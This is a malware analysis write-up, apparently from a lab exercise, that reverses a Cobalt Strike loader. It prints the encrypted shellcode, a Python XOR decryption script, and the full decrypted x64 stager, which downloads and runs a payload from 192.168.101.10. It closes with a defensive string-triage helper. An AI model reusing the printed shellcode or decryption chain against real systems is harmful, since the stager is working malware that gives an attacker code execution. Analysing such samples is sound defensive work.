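Notes on a Malware Analysis
Main reference
https://oceanzbz.github.io/2025/04/04/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/cyberstrikelab/CERT-1/
0x1. ThreatBook lookup
Submitting the sample to ThreatBook identifies it as a Cobalt Strike (CS) payload, but the static detection did not return an IP address.
0x2. Reverse engineering
The exe generated by CS is really a loader: it loads the shellcode embedded in it, and that shellcode carries out the main functionality. So when reversing the sample, the main goal is to find the shellcode inside the loader.
Check for a packer: the sample is not packed, and it is 64-bit.
Step into this function.
Continue into 401955.
It first gets the system timestamp, then concatenates a string and creates a thread, reads the shellcode through a pipe, and executes it. Follow into sub_401902.
It first allocates memory and then sleeps. Next, follow into sub_401862.
Here we see the shellcode being read. Now go back and look at sub_40174A.
This is roughly the decryption routine, so all that remains is to locate the shellcode and decrypt it.
Extract the encrypted shellcode bytes from the loader.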
Then write a script to decrypt it:
s = [0x93, 0x4F, 0x40, 0xF0, 0x9F, 0xEF, 0x0B, 0x14, 0x6F, 0x07, 0x82, 0x45, 0x2E, 0x57, 0x91, 0x45, 0x39, 0x4F, 0xF2, 0xC6, 0x0A, 0x4F, 0x48, 0x46, 0x0F, 0x4F, 0x48, 0x46, 0x77, 0x4F, 0x48, 0x46, 0x4F, 0x4F, 0x48, 0x66, 0x3F, 0x4F, 0xCC, 0xA3, 0x25, 0x4D, 0x8E, 0x25, 0xA6, 0x4F, 0xF2, 0xD4, 0xC3, 0x3B, 0xA2, 0x68, 0x6D, 0x2B, 0xE3, 0x55, 0xAE, 0xCE, 0xCE, 0x55, 0x6E, 0xC6, 0x21, 0xF9, 0x3D, 0x46, 0x92, 0x5C, 0xE4, 0x55, 0xE3, 0x9F, 0x2D, 0x3B, 0x8B, 0x15, 0xBF, 0x61, 0x42, 0x6C, 0x77, 0x0C, 0xC1, 0x61, 0x1D, 0x8C, 0x43, 0x9C, 0x6F, 0x07, 0xC3, 0x5C, 0xEA, 0xC7, 0xB7, 0x73, 0x27, 0x06, 0x13, 0x44, 0xE4, 0x4F, 0xDB, 0x50, 0xE4, 0x47, 0xE3, 0x5D, 0x6E, 0xD7, 0x20, 0x42, 0x27, 0xF8, 0x0A, 0x55, 0xE4, 0x33, 0x4B, 0x5C, 0x6E, 0xD1, 0x8E, 0x25, 0xA6, 0x4F, 0xF2, 0xD4, 0xC3, 0x46, 0x02, 0xDD, 0x62, 0x46, 0xC2, 0xD5, 0x57, 0xE7, 0xB6, 0xE5, 0x23, 0x04, 0x8F, 0x30, 0x67, 0x42, 0xFA, 0xC5, 0x1A, 0xDF, 0x9B, 0x50, 0xE4, 0x47, 0xE7, 0x5D, 0x6E, 0xD7, 0xA5, 0x55, 0xE4, 0x0B, 0x8B, 0x50, 0xE4, 0x47, 0xDF, 0x5D, 0x6E, 0xD7, 0x82, 0x9F, 0x6B, 0x8F, 0x8B, 0x15, 0xBF, 0x46, 0x9B, 0x55, 0x37, 0x59, 0x9A, 0x4E, 0x2E, 0x5F, 0x82, 0x4D, 0x2E, 0x5D, 0x8B, 0x97, 0x83, 0x27, 0x82, 0x46, 0x90, 0xE7, 0x9B, 0x55, 0x36, 0x5D, 0x8B, 0x9F, 0x7D, 0xEE, 0x8C, 0xEB, 0x90, 0xF8, 0x9E, 0x7E, 0x6F, 0x4E, 0x7D, 0x63, 0x06, 0x69, 0xAA, 0x7A, 0x0A, 0x73, 0xC3, 0x55, 0x39, 0x4E, 0x4A, 0xF2, 0x23, 0x8E, 0x32, 0x55, 0xD5, 0x4B, 0xB4, 0x32, 0x68, 0xF8, 0x16, 0x5C, 0x5E, 0xCE, 0x8B, 0x25, 0xBD, 0x4A, 0xF2, 0xD4, 0x22, 0x36, 0x0A, 0x55, 0x3F, 0x46, 0x93, 0x55, 0xD5, 0x3D, 0x95, 0x6D, 0xC8, 0xF8, 0x16, 0xFD, 0xFC, 0x07, 0xC3, 0x14, 0x35, 0x4F, 0x4A, 0xD5, 0x2E, 0xBF, 0xA4, 0x37, 0x6F, 0x07, 0x8E, 0x25, 0xA6, 0x46, 0x92, 0x55, 0x3E, 0x6D, 0xC0, 0x55, 0x3E, 0x46, 0x79, 0x43, 0xE6, 0x98, 0x05, 0xEB, 0xBA, 0xEC, 0xBA, 0x4F, 0x27, 0x8E, 0x02, 0x5C, 0x5E, 0xD5, 0x8A, 0x9D, 0xB7, 0x4A, 0xF2, 0xDD, 0x3D, 0x6F, 0xC3, 0x26, 0xAF, 0x83, 0x91, 0x46, 0x2E, 0xBD, 0x28, 0x41, 0x41, 0x3C, 0x3C, 0xC1, 0x27, 0x8E, 0x05, 0x5C, 
0xEC, 0xC4, 0x93, 0x7E, 0x65, 0x58, 0x8B, 0x9D, 0x9E, 0xBD, 0xDC, 0x14, 0x6F, 0x07, 0xA9, 0x14, 0x07, 0x87, 0xF0, 0x14, 0x6F, 0x4E, 0x4A, 0xF4, 0x2E, 0xBE, 0xC7, 0x14, 0x6F, 0x07, 0x82, 0xAE, 0x1A, 0x41, 0x5D, 0x92, 0x90, 0xD2, 0x8B, 0x9D, 0x9E, 0x4F, 0x4A, 0xCE, 0x26, 0xC0, 0x03, 0xEB, 0x90, 0xF8, 0x3C, 0x59, 0x5E, 0xCE, 0x91, 0x46, 0x2E, 0xBD, 0xEE, 0x12, 0x77, 0x7C, 0x3C, 0xC1, 0xEA, 0xC7, 0xCC, 0x91, 0xF2, 0x06, 0xC3, 0x14, 0x27, 0xF8, 0x0C, 0x1B, 0xEB, 0x8B, 0xC2, 0x14, 0x6F, 0xEC, 0x70, 0xFD, 0x8B, 0x06, 0xC3, 0x14, 0x87, 0x85, 0x3C, 0xEB, 0x90, 0x28, 0x94, 0x6D, 0x25, 0x44, 0xC3, 0x36, 0x7E, 0x22, 0xFC, 0x4C, 0x50, 0x58, 0x72, 0x93, 0xB5, 0x7D, 0x90, 0x4F, 0x71, 0xB1, 0x40, 0x73, 0xFA, 0xF9, 0x45, 0xC9, 0xC1, 0x9F, 0x7E, 0x22, 0x1B, 0x23, 0x05, 0x7A, 0x15, 0x7B, 0xDF, 0x99, 0x1B, 0xBC, 0x22, 0x3E, 0x02, 0xF2, 0x16, 0xDC, 0xA5, 0x56, 0xCC, 0xEC, 0xA1, 0x7F, 0xD7, 0xBD, 0x32, 0xF2, 0x18, 0x42, 0x9C, 0xC4, 0x09, 0xCA, 0x14, 0x04, 0xE6, 0x0D, 0x2A, 0xEC, 0x71, 0xB6, 0xB7, 0x7F, 0x48, 0x35, 0x86, 0x54, 0x1A, 0xBE, 0x6F, 0x52, 0xB0, 0x71, 0x1D, 0x2A, 0x82, 0x73, 0x0A, 0x69, 0xB7, 0x2E, 0x4F, 0x4A, 0xAC, 0x6E, 0x06, 0x6B, 0xAF, 0x75, 0x40, 0x32, 0xED, 0x24, 0x4F, 0x2F, 0xA0, 0x7B, 0x02, 0x77, 0xA2, 0x60, 0x06, 0x65, 0xAF, 0x71, 0x54, 0x27, 0x8E, 0x47, 0x26, 0x42, 0xE3, 0x25, 0x5F, 0x29, 0xF3, 0x2F, 0x4F, 0x50, 0xAA, 0x7A, 0x0B, 0x68, 0xB4, 0x67, 0x4F, 0x49, 0x97, 0x34, 0x59, 0x29, 0xF1, 0x2F, 0x4F, 0x50, 0xAA, 0x7A, 0x59, 0x33, 0xF8, 0x34, 0x17, 0x31, 0xF7, 0x2F, 0x4F, 0x53, 0xB1, 0x7D, 0x0B, 0x62, 0xAD, 0x60, 0x40, 0x31, 0xED, 0x24, 0x46, 0x0A, 0xC9, 0x14, 0xD7, 0x79, 0xFC, 0xD3, 0x80, 0xB9, 0x0E, 0x43, 0x6E, 0xE9, 0x5B, 0x0E, 0x0F, 0x04, 0x60, 0x0F, 0x80, 0xF1, 0x50, 0x10, 0xF0, 0x39, 0x3A, 0xB8, 0x35, 0xC8, 0xA2, 0x2C, 0x40, 0xB1, 0xAF, 0x96, 0xE1, 0xB1, 0x59, 0xD6, 0xF1, 0x69, 0x53, 0x29, 0x9C, 0x04, 0x16, 0x5C, 0x5F, 0x26, 0x7F, 0x73, 0x70, 0x6C, 0x56, 0xCF, 0xD0, 0x78, 0x6E, 0x3A, 0xDB, 0xC5, 0x6A, 0x03, 0x0A, 0xDC, 0x82, 0xB9, 0x3B, 0x21, 0xC4, 0x73, 0x9D, 
0xB6, 0xF2, 0x5D, 0x1C, 0xB3, 0x08, 0x16, 0xCF, 0xE5, 0xB8, 0x23, 0x3A, 0x76, 0xEE, 0xBC, 0xAB, 0xF5, 0xD7, 0x7D, 0x9A, 0xD5, 0x9C, 0xFE, 0x2F, 0xC7, 0x30, 0x0F, 0xB1, 0x4D, 0x04, 0xF5, 0x6B, 0x8F, 0x4B, 0xC3, 0x35, 0x3A, 0x7A, 0x4B, 0x3C, 0x67, 0x13, 0xE1, 0x4B, 0x80, 0xB6, 0x7C, 0xD3, 0x03, 0x3B, 0xB7, 0xFE, 0xFC, 0xD2, 0xCE, 0x72, 0x60, 0xEF, 0xAD, 0x43, 0xCA, 0x0F, 0xED, 0x8D, 0xFC, 0x5D, 0x5B, 0xFC, 0xF4, 0xFE, 0xA6, 0x5F, 0x81, 0x78, 0x98, 0x38, 0x55, 0x04, 0x4B, 0x95, 0x84, 0xBF, 0x86, 0x59, 0xDD, 0x45, 0xD0, 0xAB, 0x77, 0x9D, 0xE6, 0xF6, 0xE3, 0x16, 0x33, 0x98, 0x20, 0xF6, 0x48, 0xEB, 0x2F, 0xD4, 0xD3, 0xDA, 0x26, 0x94, 0x1D, 0xAE, 0x26, 0x3D, 0xA3, 0x33, 0x1E, 0x87, 0x94, 0x2A, 0x04, 0x8D, 0x1C, 0x4D, 0x5A, 0xDE, 0x56, 0xC8, 0x94, 0x62, 0x5E, 0x6B, 0x23, 0x1D, 0x1F, 0xB7, 0x7A, 0x16, 0xAB, 0xBD, 0x66, 0xF8, 0x29, 0x21, 0xFD, 0xB3, 0xC1, 0x6F, 0x46, 0x7D, 0xE4, 0xDA, 0xA5, 0x95, 0xEB, 0xBA, 0x4F, 0xF2, 0xDD, 0xD5, 0x07, 0xC3, 0x54, 0x6F, 0x46, 0x7B, 0x14, 0x7F, 0x07, 0xC3, 0x55, 0xD6, 0x47, 0xC3, 0x14, 0x6F, 0x46, 0x79, 0x4C, 0xCB, 0x54, 0x26, 0xEB, 0xBA, 0x4F, 0x50, 0x47, 0x3C, 0x4F, 0x4A, 0xF3, 0x27, 0x8E, 0x32, 0x5C, 0xE6, 0xDD, 0x82, 0xAC, 0x6F, 0x27, 0xC3, 0x14, 0x26, 0x8E, 0x3A, 0x55, 0xD5, 0x15, 0x55, 0x9D, 0x8D, 0xF8, 0x16, 0x5C, 0xEC, 0xC3, 0xE3, 0x91, 0xAF, 0x73, 0x75, 0x72, 0xE4, 0x00, 0x8B, 0x15, 0xAC, 0x82, 0x03, 0x61, 0xB8, 0x5F, 0x9B, 0x4C, 0x27, 0x02, 0xC3, 0x14, 0x6F, 0x07, 0x93, 0xD7, 0x87, 0x78, 0x3E, 0xEB, 0x90, 0x36, 0xFA, 0x26, 0x41, 0x36, 0xF5, 0x2C, 0x41, 0x36, 0xF3, 0x25, 0x41, 0x36, 0xF3, 0x14, 0x6F, 0x06, 0x45, 0xB4]
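key = [0x6F, 0x07, 0xC3, 0x14]  # 4-byte XOR key
# XOR every byte with the key, cycling through it (i & 3 is i % 4)
for i in range(len(s)):
    s[i] ^= key[i & 3]
print(s)
# Print the decrypted bytes as a comma-separated hex list
for i in s:
    print(hex(i), end=',')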
Then convert the result to ASCII, or hand it to an AI.
This is the AI's result:
Script:
a = [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc8,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0x75,0x72,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4f,0xff,0xff,0xff,0x5d,0x6a,0x0,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x0,0x41,0x56,0x49,0x89,0xe6,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x48,0x31,0xc9,0x48,0x31,0xd2,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x41,0x50,0x41,0x50,0x41,0xba,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xe9,0x93,0x0,0x0,0x0,0x5a,0x48,0x89,0xc1,0x41,0xb8,0x67,0x23,0x0,0x0,0x4d,0x31,0xc9,0x41,0x51,0x41,0x51,0x6a,0x3,0x41,0x51,0x41,0xba,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x79,0x5b,0x48,0x89,0xc1,0x48,0x31,0xd2,0x49,0x89,0xd8,0x4d,0x31,0xc9,0x52,0x68,0x0,0x32,0xc0,0x84,0x52,0x52,0x41,0xba,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x48,0x83,0xc3,0x50,0x6a,0xa,0x5f,0x48,0x89,0xf1,0xba,0x1f,0x0,0x0,0x0,0x6a,0x0,0x68,0x80,0x33,0x0,0x0,0x49,0x89,0xe0,0x41,0xb9,0x4,0x0,0x0,0x0,0x41,0xba,0x75,0x46,0x9e,0x86,0xff,0xd5,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0xff,0xff,0xff,0xff,0x4d,0x31,0xc9,0x52,0x52,0x41,0xba,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0xf,0x85,0x9d,0x1,0x0,0x0,0x48,0xff,0xcf,0xf,0x84,
0x8c,0x1,0x0,0x0,0xeb,0xb3,0xe9,0xe4,0x1,0x0,0x0,0xe8,0x82,0xff,0xff,0xff,0x2f,0x57,0x79,0x4a,0x43,0x0,0x22,0x11,0x25,0x3f,0x58,0x3f,0x5f,0xb1,0x87,0xda,0x7a,0x53,0x5b,0x1e,0xb6,0x83,0x67,0x95,0xfe,0x86,0xdd,0xae,0x98,0xbd,0x36,0x74,0x24,0xc6,0x6e,0x7a,0x7c,0x1c,0x8d,0x74,0xbb,0xe1,0x2a,0x6d,0xf5,0xd5,0xc8,0xca,0x51,0xf,0xf8,0xce,0x78,0x14,0xa9,0x5d,0xf5,0xdb,0x56,0xf3,0xc3,0xca,0xde,0x7b,0x3,0x25,0x19,0x45,0xeb,0xb2,0xa2,0xd8,0x78,0x8b,0x21,0xe9,0x53,0xd9,0xaa,0x0,0x55,0x73,0x65,0x72,0x2d,0x41,0x67,0x65,0x6e,0x74,0x3a,0x20,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,0x63,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x6c,0x65,0x3b,0x20,0x4d,0x53,0x49,0x45,0x20,0x31,0x30,0x2e,0x30,0x3b,0x20,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x36,0x2e,0x32,0x3b,0x20,0x57,0x69,0x6e,0x36,0x34,0x3b,0x20,0x78,0x36,0x34,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x36,0x2e,0x30,0x29,0xd,0xa,0x0,0xb8,0x7e,0x3f,0xc7,0xef,0xbe,0xcd,0x57,0x1,0xee,0x98,0x1a,0x60,0x3,0xa3,0x1b,0xef,0xf6,0x93,0x4,0x9f,0x3e,0xf9,0xac,0x5a,0xcf,0x61,0x38,0x2f,0xb6,0x6c,0x82,0x8e,0xb6,0x9a,0xc2,0x9e,0x6e,0x90,0x3d,0xf3,0x3,0xd5,0x48,0x30,0x21,0xbc,0x67,0x1f,0x6b,0x95,0xdb,0xbf,0x7f,0xad,0x2e,0xb4,0xc2,0xa9,0x17,0x65,0xdb,0x41,0xad,0x54,0x26,0x7,0x67,0xf2,0xb1,0x31,0x49,0x73,0xb4,0xcb,0x2,0xa0,0xe2,0x7b,0x37,0x55,0x71,0x2d,0xa8,0xc4,0xf2,0x14,0x69,0xf5,0xd2,0x5f,0xea,0x40,0xc0,0xf3,0x1b,0xde,0x4a,0xc7,0xe1,0x4,0x88,0x88,0xd7,0x5a,0x3d,0xb9,0x5f,0x53,0x60,0xd0,0xf5,0x24,0x87,0x75,0x68,0xbc,0x4,0xf8,0xa3,0x91,0xfb,0x11,0xda,0x1d,0x67,0x2c,0xb9,0x2c,0xcd,0xcc,0xf9,0xe2,0xfb,0x9e,0x4f,0x93,0xf3,0x3d,0xb2,0x30,0x86,0xbb,0x8c,0x57,0x52,0xc7,0x5f,0xfa,0x83,0x7c,0x92,0x36,0xda,0x86,0xc4,0xc4,0x70,0x5e,0xf2,0x99,0xe4,0xd5,0x27,0xf7,0x27,0x35,0x5c,0x84,0x28,0x17,0xc7,0xb5,0x21,0x57,0x9,0xc1,0x21,0xfe,0xb7,0x5c,0x19,0x44,0x80,0x45,0x3,0x4e,0x8,0x22,0x5d,0x1d,0x42,0xa7,0x93,0xa1,0x4a,0x4,0x24,0xde,0xb,0xd8,0x7d,0xd5,0xbf,0xd2,0x61,0x3b,0x3d,0x4e,0xfa,0x70,0xd5,0x0,0x41,0xbe,0xf0,0xb5,0xa2,0x56
,0xff,0xd5,0x48,0x31,0xc9,0xba,0x0,0x0,0x40,0x0,0x41,0xb8,0x0,0x10,0x0,0x0,0x41,0xb9,0x40,0x0,0x0,0x0,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x41,0xb8,0x0,0x20,0x0,0x0,0x49,0x89,0xf9,0x41,0xba,0x12,0x96,0x89,0xe2,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb6,0x66,0x8b,0x7,0x48,0x1,0xc3,0x85,0xc0,0x75,0xd7,0x58,0x58,0x58,0x48,0x5,0x0,0x0,0x0,0x0,0x50,0xc3,0xe8,0x7f,0xfd,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x31,0x30,0x31,0x2e,0x31,0x30,0x0,0x0,0x1,0x86,0xa0]
# Turn every byte into its character so the embedded strings become readable
b = ''
for i in range(len(a)):
    b += chr(int(a[i]))
print(b)
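The two scripts above, generalised into one triage helper (an added example, not code from the original post): it applies the same rolling 4-byte XOR and then pulls only the printable strings out of the decoded buffer, labelling likely network indicators, instead of printing every byte as a character. The sample buffer, its strings and all function names are constructed for illustration; only the key is taken from the page.

```python
import re

KEY = bytes([0x6F, 0x07, 0xC3, 0x14])  # 4-byte key used by the script on this page


def xor_decode(data: bytes, key: bytes = KEY) -> bytes:
    """Rolling XOR: byte i is combined with key[i % len(key)] (i & 3 for 4 bytes)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def printable_strings(buf: bytes, min_len: int = 5):
    """Yield (offset, text) for runs of printable ASCII, like the `strings` utility."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, buf):
        yield m.start(), m.group().decode("ascii")


IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def classify(text: str) -> str:
    """Rough triage label for a recovered string."""
    if IPV4.match(text) and all(int(p) <= 255 for p in text.split(".")):
        return "host"
    if text.lower().startswith("user-agent:"):
        return "user-agent"
    if text.startswith("/"):
        return "uri"
    return "other"


def triage(encoded: bytes, key: bytes = KEY):
    """Decode the blob and return (offset, label, string) for each readable run."""
    decoded = xor_decode(encoded, key)
    return [(off, classify(s), s) for off, s in printable_strings(decoded)]


# Constructed sample, not the bytes from this page: a few opcode-like bytes
# followed by NUL-terminated strings, then XOR-encoded with KEY.
PLAIN_SAMPLE = (
    b"\xfc\x48\x83\xe4\xf0" + b"wininet\x00" + b"\xff\xd5" + b"/example\x00"
    + b"User-Agent: Mozilla/5.0 (constructed)\r\n\x00" + b"\xff\xd5"
    + b"192.0.2.10\x00")
SAMPLE = xor_decode(PLAIN_SAMPLE)  # XOR is its own inverse, so this encodes

if __name__ == "__main__":
    for off, kind, s in triage(SAMPLE):
        print(f"{off:#06x}  {kind:<10}  {s}")
```

The offsets it reports are positions in the decoded buffer, which makes it easy to jump to the matching bytes in a disassembler.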